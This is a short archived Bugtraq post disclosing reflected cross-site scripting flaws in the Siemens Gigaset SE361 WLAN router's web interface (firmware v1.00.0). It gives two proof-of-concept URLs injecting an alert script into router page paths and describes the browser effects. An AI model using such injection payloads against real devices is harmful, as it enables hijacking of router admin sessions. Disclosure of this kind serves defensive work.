Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

SIEMENS Gigaset SE361 router XSS

From: morin.josh () gmail com
Date: 21 Aug 2007 13:35:30 -0000
Vendor: SIEMENS 
Model: Gigaset SE361 WLAN
Firmware version: v1.00.0

Details:

http://routeraddr/prodhousing.gif";><script>alert('xss')</script>

Changes page and inputs the fallowing chars GIF89a,@€ which appears to be a crash with GIF image decoding. 

http://routeraddr/login.tri";><script>alert('xss')</script>

Causes continues loop of trying to access the login page until you close browser.Works under IE7 and Firefox.
Previous By Date Next
Previous By Thread Next

Current thread: